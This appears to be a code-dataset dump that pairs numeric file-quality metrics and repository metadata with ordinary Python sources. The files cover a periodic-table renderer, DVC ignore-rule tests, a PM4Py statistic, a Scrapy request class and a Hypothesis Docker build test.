pygame.time.get_ticks()
48.491018
138
0.618177
1,053
8,098
4.573599
0.177588
0.049834
0.026993
0.023256
0.336379
0.259759
0.186669
0.155731
0.135797
0.053987
0
0.007611
0.302297
8,098
167
139
48.491018
0.844779
0.206594
0
0.239669
0
0
0.011487
0.006766
0
0
0
0
0
1
0.082645
false
0
0.024793
0
0.115702
0.016529
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4149b0929f392e8e110537d2266f990d4929d8f0
5,054
py
Python
periodic/table.py
moopet/pyriodic
5477934881db6a00f040b9ff3624d1eca9389f36
[ "MIT" ]
null
null
null
periodic/table.py
moopet/pyriodic
5477934881db6a00f040b9ff3624d1eca9389f36
[ "MIT" ]
null
null
null
periodic/table.py
moopet/pyriodic
5477934881db6a00f040b9ff3624d1eca9389f36
[ "MIT" ]
null
null
null
from colored import fg, bg, attr from . import elements from . import layouts class PeriodicTableError(Exception): """Periodic Table exceptions.""" pass class PeriodicTable: """Periodic Table.""" def __init__(self, **kwargs): self.color = kwargs["color"] if "color" in kwargs else False self.width = kwargs["width"] if "width" in kwargs else None self.elements = elements.elements self.layouts = layouts.layouts def colorize_symbol(self, symbol, show_number=False): """Get a pretty version of a symbol or number.""" if symbol == " ": return " " symbol = symbol.lower().capitalize() text = f" {symbol:2} " if show_number: number = str(self.elements[symbol]["number"]) text = f" {number:3}" if self.color: element_color = self.elements[symbol]["color"] contrast_color = "white" if element_color == "yellow": contrast_color = "yellow_1" background_color = bg(element_color) text_color = fg(contrast_color) if show_number else fg("black") reset = attr("reset") text = f"{background_color}{text_color}{text}{reset}" return text def render_info(self, symbol): """Print summary information for a particular element.""" if symbol not in self.elements: raise PeriodicTableError(f"Symbol not found in the periodic table") if self.color: self.render_symbols([symbol]) element = self.elements[symbol] print(f"Symbol: {symbol}") print(f"Name: {element['name']}") if "origin" in element: print(f"Origin of name: {element['origin']}") print(f"Series: {element['series'].capitalize()}") print(f"Atomic number: {element['number']}") print(f"Period: {element['period']}") if "group" in element: print(f"Group: {element['group']}") def render_table(self, layout="standard", show_grid=False): """Print the classic periodic table using current output configuration.""" if layout not in self.layouts: raise PeriodicTableError(f"Unknown table layout '{layout}'") if show_grid: print(" " + self.layouts[layout]["grid"]) print() period = 1 for line in self.layouts[layout]["table"].splitlines(): line = f" {line} " is_top_line = period == int(period) period += 0.5 for symbol in self.elements: replacement = self.colorize_symbol(symbol, is_top_line) line = line.replace(f" {symbol:2} ", replacement) if show_grid: header = int(period) if period < 8 and is_top_line else ' ' line = f"{header} {line}" if self.color: reset = attr('reset') for symbol in self.elements: color = bg(self.elements[symbol]["color"]) pattern = f" {symbol:2} " line = line.replace(pattern, f"{color}{pattern}{reset}") print(line) def render_symbols(self, symbols): """Print a list of symbols using current output configuration.""" columns = int(self.width / 4) lines = [symbols[i:i + columns] for i in range(0, len(symbols), columns)] for line in lines: top = [self.colorize_symbol(symbol, show_number=True) for symbol in line] bottom = [self.colorize_symbol(symbol) for symbol in line] print("".join(top)) print("".join(bottom)) def get_solutions(self, word, recursing=False): """Find all permutations that can spell a word.""" if not recursing: self.stack = [] self.results = [] word = word.lower() for symbol in self.elements: symbol = symbol.lower() if symbol == word: if self.stack not in self.results: self.stack.append(symbol) self.results.append(self.stack) self.stack = self.stack[:-1] continue if symbol == word[:len(symbol)]: self.stack.append(symbol) self.get_solutions(word[len(symbol):], recursing=True) self.stack = self.stack[:-1] return sorted(self.results, key=self.get_solution_ranking) def get_solution_ranking(self, solution): """Score a solution based on length and number of repeated symbols.""" return len(solution) + 100 * (len(solution) - len(set(solution))) def get_symbol_from_atomic_number(self, number): """Translate an atomic number into an element's symbol.""" number = int(number) elements = self.elements matches = [e for e in elements if elements[e]["number"] == number] return matches[0] if matches else None
30.630303
85
0.564899
580
5,054
4.843103
0.22931
0.04272
0.03204
0.01602
0.055892
0
0
0
0
0
0
0.004928
0.317372
5,054
164
86
30.817073
0.809275
0.085081
0
0.118812
0
0
0.113786
0.021444
0
0
0
0
0
1
0.079208
false
0.009901
0.029703
0
0.178218
0.118812
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4149c18516a466d5bd042367b350b07706f720b8
536
py
Python
data_model/transaction.py
chryoung/beancount_importer
664d4bf07d7b953afca4cf9fce7436c942390c52
[ "MIT" ]
2
2021-08-18T14:05:46.000Z
2021-09-24T07:44:23.000Z
data_model/transaction.py
chryoung/beancount_importer
664d4bf07d7b953afca4cf9fce7436c942390c52
[ "MIT" ]
1
2021-09-24T08:00:26.000Z
2021-10-07T10:45:28.000Z
data_model/transaction.py
chryoung/beancount_importer
664d4bf07d7b953afca4cf9fce7436c942390c52
[ "MIT" ]
null
null
null
from datetime import date from enum import IntEnum class TransactionDirection(IntEnum): EXPENSES = 0 INCOME = 1 class Transaction: def __init__(self): self.will_import = True self.transaction_date = date.today() self.payee = '' self.description = '' self.amount = 0 self.currency = '' self.bill_payment_account = '' self.direction = TransactionDirection.EXPENSES self.from_account = '' self.to_account = '' self.is_modified = False
23.304348
54
0.619403
56
536
5.732143
0.553571
0.102804
0
0
0
0
0
0
0
0
0
0.007916
0.29291
536
22
55
24.363636
0.83905
0
0
0
0
0
0
0
0
0
0
0
0
1
0.055556
false
0
0.166667
0
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
414dbeebee592b4e49d79aec901a1680c586b5fb
3,617
py
Python
ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py
Malekhy/ws2122-lspm
e4dc8b801d12f862b8ef536a0f125f346f085a00
[ "MIT" ]
1
2022-01-19T04:02:46.000Z
2022-01-19T04:02:46.000Z
ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py
Malekhy/ws2122-lspm
e4dc8b801d12f862b8ef536a0f125f346f085a00
[ "MIT" ]
1
2021-11-19T07:21:48.000Z
2021-11-19T07:21:48.000Z
ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py
Malekhy/ws2122-lspm
e4dc8b801d12f862b8ef536a0f125f346f085a00
[ "MIT" ]
1
2022-01-14T17:15:38.000Z
2022-01-14T17:15:38.000Z
''' This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de). PM4Py is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. PM4Py is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with PM4Py. If not, see <https://www.gnu.org/licenses/>. ''' from enum import Enum from pm4py.algo.discovery.dfg.adapters.pandas.df_statistics import get_concurrent_events_dataframe from pm4py.util import exec_utils, constants, xes_constants from typing import Optional, Dict, Any, Union, Tuple, List, Set import pandas as pd class Parameters(Enum): ACTIVITY_KEY = constants.PARAMETER_CONSTANT_ACTIVITY_KEY CASE_ID_KEY = constants.PARAMETER_CONSTANT_CASEID_KEY TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_TIMESTAMP_KEY START_TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_START_TIMESTAMP_KEY STRICT = "strict" def apply(dataframe: pd.DataFrame, parameters: Optional[Dict[Union[str, Parameters], Any]] = None) -> Dict[Tuple[str, str], int]: """ Gets the number of times for which two activities have been concurrent in the log Parameters -------------- dataframe Pandas dataframe parameters Parameters of the algorithm, including: - Parameters.ACTIVITY_KEY => activity key - Parameters.CASE_ID_KEY => case id - Parameters.START_TIMESTAMP_KEY => start timestamp - Parameters.TIMESTAMP_KEY => complete timestamp - Parameters.STRICT => Determine if only entries that are strictly concurrent (i.e. the length of the intersection as real interval is > 0) should be obtained. Default: False Returns -------------- ret_dict Dictionaries associating to a couple of activities (tuple) the number of times for which they have been executed in parallel in the log """ if parameters is None: parameters = {} activity_key = exec_utils.get_param_value(Parameters.ACTIVITY_KEY, parameters, xes_constants.DEFAULT_NAME_KEY) case_id_glue = exec_utils.get_param_value(Parameters.CASE_ID_KEY, parameters, constants.CASE_CONCEPT_NAME) timestamp_key = exec_utils.get_param_value(Parameters.TIMESTAMP_KEY, parameters, xes_constants.DEFAULT_TIMESTAMP_KEY) start_timestamp_key = exec_utils.get_param_value(Parameters.START_TIMESTAMP_KEY, parameters, None) strict = exec_utils.get_param_value(Parameters.STRICT, parameters, False) concurrent_dataframe = get_concurrent_events_dataframe(dataframe, start_timestamp_key=start_timestamp_key, timestamp_key=timestamp_key, case_id_glue=case_id_glue, activity_key=activity_key, strict=strict) ret_dict0 = concurrent_dataframe.groupby([activity_key, activity_key + '_2']).size().to_dict() ret_dict = {} # assure to avoid problems with np.float64, by using the Python float type for el in ret_dict0: # avoid getting two entries for the same set of concurrent activities el2 = tuple(sorted(el)) ret_dict[el2] = int(ret_dict0[el]) return ret_dict
44.654321
129
0.709151
474
3,617
5.21308
0.367089
0.072845
0.048159
0.034399
0.22501
0.117766
0.049777
0.035613
0
0
0
0.006043
0.222284
3,617
80
130
45.2125
0.872378
0.431573
0
0
0
0
0.004169
0
0
0
0
0
0
1
0.034483
false
0
0.172414
0
0.448276
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4151c5c3dbe7d9b634bc3106ccbd1a50caa1fb1f
1,120
py
Python
pipeline.py
Overnickel/eclip
8c52160d4e4418b4b1e186f30b4e06491ada9c40
[ "MIT" ]
null
null
null
pipeline.py
Overnickel/eclip
8c52160d4e4418b4b1e186f30b4e06491ada9c40
[ "MIT" ]
null
null
null
pipeline.py
Overnickel/eclip
8c52160d4e4418b4b1e186f30b4e06491ada9c40
[ "MIT" ]
1
2020-03-05T23:58:04.000Z
2020-03-05T23:58:04.000Z
import os import argparse import yaml import pprint from easydict import EasyDict as edict from download import download from read_process import read_process from de_analysis import de from cancer import cancer def parse_args(): parser = argparse.ArgumentParser(description='eCLIP') parser.add_argument('--config', dest='config_file', help='configuration filename', default='configs.yml', type=str) return parser.parse_args() def load_config(config_path): with open(config_path, 'r') as f: config = edict(yaml.load(f)) return config def main(): print('ECLIP data processing pipeline.') ## load config file args = parse_args() if args.config_file is None: raise Exception('no configuration file') config = load_config(args.config_file) pprint.PrettyPrinter(indent=2).pprint(config) ## download data download(config) ## reads processing read_process(config) ## differential expression analysis de(config) ## cancer cancer(config) if __name__ == '__main__': main()
21.960784
57
0.677679
136
1,120
5.411765
0.441176
0.054348
0.038043
0
0
0
0
0
0
0
0
0.00116
0.230357
1,120
50
58
22.4
0.852668
0.077679
0
0
0
0
0.11546
0
0
0
0
0
0
1
0.09375
false
0
0.28125
0
0.4375
0.09375
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41528f11f89e17b45a8aaf9f472409371cd43c86
887
py
Python
finscraper/request.py
jmyrberg/finscraper
f90399a0c33247d3bb896ca987ef6f293609abe0
[ "MIT" ]
null
null
null
finscraper/request.py
jmyrberg/finscraper
f90399a0c33247d3bb896ca987ef6f293609abe0
[ "MIT" ]
24
2020-05-09T19:18:30.000Z
2020-11-21T22:47:39.000Z
finscraper/request.py
jmyrberg/finscraper
f90399a0c33247d3bb896ca987ef6f293609abe0
[ "MIT" ]
null
null
null
"""Module for custom Scrapy request components.""" from scrapy import Request class SeleniumCallbackRequest(Request): """Process request with given callback using Selenium. Args: selenium_callback (func or None, optional): Function that will be called with the chrome webdriver. The function should take in parameters (request, spider, driver) and return request, response or None. If None, driver will be used for fetching the page, and return is response. Defaults to None. """ def __init__(self, *args, selenium_callback=None, **kwargs): meta = kwargs.pop('meta', {}) or {} if 'selenium_callback' not in meta: meta['selenium_callback'] = selenium_callback new_kwargs = dict(**kwargs, meta=meta) super(SeleniumCallbackRequest, self).__init__(*args, **new_kwargs)
36.958333
77
0.668546
105
887
5.504762
0.52381
0.138408
0.069204
0
0
0
0
0
0
0
0
0
0.24239
887
23
78
38.565217
0.860119
0.491545
0
0
0
0
0.092457
0
0
0
0
0
0
1
0.125
false
0
0.125
0
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41533ac389ddcc893deaa3a3dea233e8a8c4234c
12,254
py
Python
tests/func/test_ignore.py
farizrahman4u/dvc
a56c8bbab662c3792ae12aa7db6c40a42a23de50
[ "Apache-2.0" ]
1
2020-08-12T22:51:45.000Z
2020-08-12T22:51:45.000Z
tests/func/test_ignore.py
farizrahman4u/dvc
a56c8bbab662c3792ae12aa7db6c40a42a23de50
[ "Apache-2.0" ]
null
null
null
tests/func/test_ignore.py
farizrahman4u/dvc
a56c8bbab662c3792ae12aa7db6c40a42a23de50
[ "Apache-2.0" ]
1
2020-11-28T11:47:48.000Z
2020-11-28T11:47:48.000Z
import os import shutil import pytest from dvc.exceptions import DvcIgnoreInCollectedDirError from dvc.ignore import ( DvcIgnore, DvcIgnoreDirs, DvcIgnorePatterns, DvcIgnorePatternsTrie, DvcIgnoreRepo, ) from dvc.path_info import PathInfo from dvc.repo import Repo from dvc.tree.local import LocalRemoteTree from dvc.utils import relpath from dvc.utils.fs import get_mtime_and_size from tests.dir_helpers import TmpDir def test_ignore(tmp_dir, dvc, monkeypatch): tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}}) tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored") dvc.tree.__dict__.pop("dvcignore", None) path = PathInfo(tmp_dir) assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"} def test_ignore_unicode(tmp_dir, dvc): tmp_dir.gen({"dir": {"other": "text", "тест": "проверка"}}) tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/тест") dvc.tree.__dict__.pop("dvcignore", None) path = PathInfo(tmp_dir) assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"} def test_rename_ignored_file(tmp_dir, dvc): tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}}) tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "ignored*") dvc.tree.__dict__.pop("dvcignore", None) mtime, size = get_mtime_and_size("dir", dvc.tree) shutil.move("dir/ignored", "dir/ignored_new") new_mtime, new_size = get_mtime_and_size("dir", dvc.tree) assert new_mtime == mtime and new_size == size def test_rename_file(tmp_dir, dvc): tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}}) mtime, size = get_mtime_and_size("dir", dvc.tree) shutil.move("dir/foo", "dir/foo_new") new_mtime, new_size = get_mtime_and_size("dir", dvc.tree) assert new_mtime != mtime and new_size == size def test_remove_ignored_file(tmp_dir, dvc): tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}}) tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored") dvc.tree.__dict__.pop("dvcignore", None) mtime, size = get_mtime_and_size("dir", dvc.tree) os.remove("dir/ignored") new_mtime, new_size = get_mtime_and_size("dir", dvc.tree) assert new_mtime == mtime and new_size == size def test_remove_file(tmp_dir, dvc): tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}}) mtime, size = get_mtime_and_size("dir", dvc.tree) os.remove("dir/foo") new_mtime, new_size = get_mtime_and_size("dir", dvc.tree) assert new_mtime != mtime and new_size != size def test_dvcignore_in_out_dir(tmp_dir, dvc): tmp_dir.gen({"dir": {"foo": "foo", DvcIgnore.DVCIGNORE_FILE: ""}}) with pytest.raises(DvcIgnoreInCollectedDirError): dvc.add("dir") @pytest.mark.parametrize("dname", ["dir", "dir/subdir"]) def test_ignore_collecting_dvcignores(tmp_dir, dvc, dname): tmp_dir.gen({"dir": {"subdir": {}}}) top_ignore_file = (tmp_dir / dname).with_name(DvcIgnore.DVCIGNORE_FILE) top_ignore_file.write_text(os.path.basename(dname)) dvc.tree.__dict__.pop("dvcignore", None) ignore_file = tmp_dir / dname / DvcIgnore.DVCIGNORE_FILE ignore_file.write_text("foo") assert len(dvc.tree.dvcignore.ignores) == 3 assert DvcIgnoreDirs([".git", ".hg", ".dvc"]) in dvc.tree.dvcignore.ignores ignore_pattern_trie = None for ignore in dvc.tree.dvcignore.ignores: if isinstance(ignore, DvcIgnorePatternsTrie): ignore_pattern_trie = ignore assert ignore_pattern_trie is not None assert ( DvcIgnorePatterns.from_files( os.fspath(top_ignore_file), LocalRemoteTree(None, {"url": dvc.root_dir}), ) == ignore_pattern_trie[os.fspath(ignore_file)] ) assert any( i for i in dvc.tree.dvcignore.ignores if isinstance(i, DvcIgnoreRepo) ) def test_ignore_on_branch(tmp_dir, scm, dvc): tmp_dir.scm_gen({"foo": "foo", "bar": "bar"}, commit="add files") with tmp_dir.branch("branch", new=True): tmp_dir.scm_gen(DvcIgnore.DVCIGNORE_FILE, "foo", commit="add ignore") dvc.tree.__dict__.pop("dvcignore", None) path = PathInfo(tmp_dir) assert set(dvc.tree.walk_files(path)) == { path / "foo", path / "bar", } dvc.tree = scm.get_tree("branch", use_dvcignore=True) assert set(dvc.tree.walk_files(path)) == { os.fspath(path / DvcIgnore.DVCIGNORE_FILE), os.fspath(path / "bar"), } def test_match_nested(tmp_dir, dvc): tmp_dir.gen( { ".dvcignore": "*.backup\ntmp", "foo": "foo", "tmp": "...", "dir": {"x.backup": "x backup", "tmp": "content"}, } ) dvc.tree.__dict__.pop("dvcignore", None) result = {os.fspath(os.path.normpath(f)) for f in dvc.tree.walk_files(".")} assert result == {".dvcignore", "foo"} def test_ignore_external(tmp_dir, scm, dvc, tmp_path_factory): tmp_dir.gen(".dvcignore", "*.backup\ntmp") ext_dir = TmpDir(os.fspath(tmp_path_factory.mktemp("external_dir"))) ext_dir.gen({"y.backup": "y", "tmp": "ext tmp"}) result = {relpath(f, ext_dir) for f in dvc.tree.walk_files(ext_dir)} assert result == {"y.backup", "tmp"} def test_ignore_subrepo(tmp_dir, scm, dvc): tmp_dir.gen({".dvcignore": "foo", "subdir": {"foo": "foo"}}) scm.add([".dvcignore"]) scm.commit("init parent dvcignore") dvc.tree.__dict__.pop("dvcignore", None) subrepo_dir = tmp_dir / "subdir" assert not dvc.tree.exists(PathInfo(subrepo_dir / "foo")) with subrepo_dir.chdir(): subrepo = Repo.init(subdir=True) scm.add(str(subrepo_dir / "foo")) scm.commit("subrepo init") for _ in subrepo.brancher(all_commits=True): assert subrepo.tree.exists(PathInfo(subrepo_dir / "foo")) def test_ignore_blank_line(tmp_dir, dvc): tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}}) tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "foo\n\ndir/ignored") dvc.tree.__dict__.pop("dvcignore", None) path = PathInfo(tmp_dir) assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"} # It is not possible to re-include a file if a parent directory of # that file is excluded. # Git doesn’t list excluded directories for performance reasons, # so any patterns on contained files have no effect, # no matter where they are defined. @pytest.mark.parametrize( "data_struct, pattern_list, result_set", [ ( {"dir": {"subdir": {"not_ignore": "121"}}}, ["subdir/*", "!not_ignore"], {os.path.join("dir", "subdir", "not_ignore")}, ), ( {"dir": {"subdir": {"should_ignore": "121"}}}, ["subdir", "!should_ignore"], set(), ), ( {"dir": {"subdir": {"should_ignore": "121"}}}, ["subdir/", "!should_ignore"], set(), ), ], ) def test_ignore_file_in_parent_path( tmp_dir, dvc, data_struct, pattern_list, result_set ): tmp_dir.gen(data_struct) tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "\n".join(pattern_list)) dvc.tree.__dict__.pop("dvcignore", None) path = PathInfo(tmp_dir) assert set(dvc.tree.walk_files(path / "dir")) == { path / relpath for relpath in result_set } # If there is a separator at the end of the pattern then the pattern # will only match directories, # otherwise the pattern can match both files and directories. # For example, a pattern doc/frotz/ matches doc/frotz directory, # but not a/doc/frotz directory; def test_ignore_sub_directory(tmp_dir, dvc): tmp_dir.gen( { "dir": { "doc": {"fortz": {"b": "b"}}, "a": {"doc": {"fortz": {"a": "a"}}}, } } ) tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "doc/fortz"}}) dvc.tree.__dict__.pop("dvcignore", None) path = PathInfo(tmp_dir) assert set(dvc.tree.walk_files(path / "dir")) == { path / "dir" / "a" / "doc" / "fortz" / "a", path / "dir" / DvcIgnore.DVCIGNORE_FILE, } # however frotz/ matches frotz and a/frotz that is a directory def test_ignore_directory(tmp_dir, dvc): tmp_dir.gen({"dir": {"fortz": {}, "a": {"fortz": {}}}}) tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "fortz"}}) dvc.tree.__dict__.pop("dvcignore", None) path = PathInfo(tmp_dir) assert set(dvc.tree.walk_files(path / "dir")) == { path / "dir" / DvcIgnore.DVCIGNORE_FILE, } def test_multi_ignore_file(tmp_dir, dvc, monkeypatch): tmp_dir.gen({"dir": {"subdir": {"should_ignore": "1", "not_ignore": "1"}}}) tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/subdir/*_ignore") tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "!subdir/not_ignore"}}) dvc.tree.__dict__.pop("dvcignore", None) path = PathInfo(tmp_dir) assert set(dvc.tree.walk_files(path / "dir")) == { path / "dir" / "subdir" / "not_ignore", path / "dir" / DvcIgnore.DVCIGNORE_FILE, } def test_pattern_trie_tree(tmp_dir, dvc): tmp_dir.gen( { "top": { "first": { DvcIgnore.DVCIGNORE_FILE: "a\nb\nc", "middle": { "second": { DvcIgnore.DVCIGNORE_FILE: "d\ne\nf", "bottom": {}, } }, }, }, "other": {DvcIgnore.DVCIGNORE_FILE: "1\n2\n3"}, } ) dvc.tree.__dict__.pop("dvcignore", None) ignore_pattern_trie = None for ignore in dvc.tree.dvcignore.ignores: if isinstance(ignore, DvcIgnorePatternsTrie): ignore_pattern_trie = ignore break assert ignore_pattern_trie is not None ignore_pattern_top = ignore_pattern_trie[os.fspath(tmp_dir / "top")] ignore_pattern_other = ignore_pattern_trie[os.fspath(tmp_dir / "other")] ignore_pattern_first = ignore_pattern_trie[ os.fspath(tmp_dir / "top" / "first") ] ignore_pattern_middle = ignore_pattern_trie[ os.fspath(tmp_dir / "top" / "first" / "middle") ] ignore_pattern_second = ignore_pattern_trie[ os.fspath(tmp_dir / "top" / "first" / "middle" / "second") ] ignore_pattern_bottom = ignore_pattern_trie[ os.fspath(tmp_dir / "top" / "first" / "middle" / "second" / "bottom") ] assert not ignore_pattern_top assert ( DvcIgnorePatterns([], os.fspath(tmp_dir / "top")) == ignore_pattern_top ) assert ( DvcIgnorePatterns(["1", "2", "3"], os.fspath(tmp_dir / "other")) == ignore_pattern_other ) assert ( DvcIgnorePatterns( ["a", "b", "c"], os.fspath(tmp_dir / "top" / "first") ) == ignore_pattern_first ) assert ( DvcIgnorePatterns( ["a", "b", "c"], os.fspath(tmp_dir / "top" / "first") ) == ignore_pattern_middle ) assert ( DvcIgnorePatterns( [ "a", "b", "c", "/middle/second/**/d", "/middle/second/**/e", "/middle/second/**/f", ], os.fspath(tmp_dir / "top" / "first"), ) == ignore_pattern_second ) assert ( DvcIgnorePatterns( [ "a", "b", "c", "/middle/second/**/d", "/middle/second/**/e", "/middle/second/**/f", ], os.fspath(tmp_dir / "top" / "first"), ) == ignore_pattern_bottom ) def test_ignore_in_added_dir(tmp_dir, dvc): tmp_dir.gen( { "dir": { "sub": { "ignored": {"content": "ignored content"}, "not_ignored": "not ignored content", } }, ".dvcignore": "**/ignored", } ) dvc.tree.__dict__.pop("dvcignore", None) ignored_path = tmp_dir / "dir" / "sub" / "ignored" assert not dvc.tree.exists(PathInfo(ignored_path)) assert ignored_path.exists() dvc.add("dir") shutil.rmtree(ignored_path) dvc.checkout() assert not ignored_path.exists()
31.260204
79
0.5945
1,518
12,254
4.550066
0.128459
0.065151
0.036485
0.027798
0.582597
0.544665
0.491386
0.397568
0.371218
0.345012
0
0.002172
0.248572
12,254
391
80
31.340153
0.747937
0.044557
0
0.350649
0
0
0.133892
0
0
0
0
0
0.107143
1
0.061688
false
0
0.035714
0
0.097403
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41538b4330b560554f0aa682385fd505950bc0e9
1,128
py
Python
test_app.py
jeshan/hypothesis-test-python-versions
8bb26275937dc02a2a996aa2c09e9c48a3f87419
[ "BSD-2-Clause" ]
null
null
null
test_app.py
jeshan/hypothesis-test-python-versions
8bb26275937dc02a2a996aa2c09e9c48a3f87419
[ "BSD-2-Clause" ]
null
null
null
test_app.py
jeshan/hypothesis-test-python-versions
8bb26275937dc02a2a996aa2c09e9c48a3f87419
[ "BSD-2-Clause" ]
null
null
null
from subprocess import call from tempfile import NamedTemporaryFile from hypothesis import settings, note from hypothesis.stateful import RuleBasedStateMachine, rule from hypothesis.strategies import sampled_from def versions(): """ generates only minor versions available on Docker Hub """ # TODO: treat as sem-ver version to allow accurate ordering (exercise left to the reader) return sampled_from(['3.5', '3.6', '3.7', '3.8']) class TestPythonVersions(RuleBasedStateMachine): @rule(version=versions()) def try_build_image(self, version): with NamedTemporaryFile() as tmp: print(f"building in Python version {version} ({tmp.name})") contents = f"""FROM python:{version}-alpine COPY demoapp.py . RUN python demoapp.py """ tmp.write(contents.encode()) tmp.flush() note(f'Program does not run on Python {version}') exit_code = call(f'docker build -f {tmp.name} .'.split(' ')) assert exit_code == 0 TestPythonVersions.TestCase.settings = settings(deadline=None) test_python_versions = TestPythonVersions.TestCase
33.176471
93
0.696809
139
1,128
5.597122
0.561151
0.053985
0
0
0
0
0
0
0
0
0
0.009956
0.198582
1,128
33
94
34.181818
0.850664
0.126773
0
0
0
0
0.203476
0.023517
0
0
0
0.030303
0.043478
1
0.086957
false
0
0.217391
0
0.391304
0.043478
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
4154f5618899e57ee64e540445a53194c1b762ee
1,479
py
Python
synthea-hiv/uploader/uploader_test.py
GoogleCloudPlatform/openmrs-fhir-analytics
839a5c54e0c81d174522dcb9930b26bc49dfa748
[ "ECL-2.0", "Apache-2.0" ]
39
2020-08-07T18:10:21.000Z
2021-12-24T14:08:36.000Z
synthea-hiv/uploader/uploader_test.py
mozzy11/openmrs-fhir-analytics
796c75f3cc94cfad08e6e4a42d670830e9302d17
[ "Apache-2.0" ]
205
2020-08-20T05:25:29.000Z
2022-02-04T19:20:44.000Z
synthea-hiv/uploader/uploader_test.py
mozzy11/openmrs-fhir-analytics
796c75f3cc94cfad08e6e4a42d670830e9302d17
[ "Apache-2.0" ]
32
2020-08-13T19:14:50.000Z
2022-03-25T04:45:39.000Z
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from unittest import mock import uploader class UploaderTest(unittest.TestCase): def setUp(self): super().setUp() self.mock_client = mock.MagicMock() self.mock_bundle = mock.MagicMock() self._upload_resource = mock.patch.object( uploader.Uploader, '_upload_resource', return_value='123').start() def test_upload_bundle(self): self.mock_bundle.openmrs_patient = mock.MagicMock() upload_handler = uploader.Uploader(self.mock_client) upload_handler.upload_openmrs_bundle(self.mock_bundle) self.assertTrue(self._upload_resource.called) self.assertEqual(self.mock_bundle.openmrs_patient.base.new_id, '123') def test_upload_bundle_gcp(self): self.mock_bundle.patient = None upload_handler = uploader.Uploader(self.mock_client) upload_handler.upload_bundle(self.mock_bundle) self.assertFalse(self._upload_resource.called)
35.214286
74
0.76403
206
1,479
5.325243
0.480583
0.065634
0.076572
0.02917
0.20784
0.113036
0.113036
0.113036
0.113036
0.113036
0
0.01112
0.148749
1,479
41
75
36.073171
0.860207
0.370521
0
0.095238
0
0
0.023991
0
0
0
0
0
0.142857
1
0.142857
false
0
0.142857
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4155116ee8c8f0032b20650c9fd29fb3f6faf25b
7,033
py
Python
stargazing/pomodoro/pomodoro_controller.py
mtu2/stargazing
8c32728d64e8a7273299ab9d88e814d7a7bb47f2
[ "MIT" ]
null
null
null
stargazing/pomodoro/pomodoro_controller.py
mtu2/stargazing
8c32728d64e8a7273299ab9d88e814d7a7bb47f2
[ "MIT" ]
null
null
null
stargazing/pomodoro/pomodoro_controller.py
mtu2/stargazing
8c32728d64e8a7273299ab9d88e814d7a7bb47f2
[ "MIT" ]
null
null
null
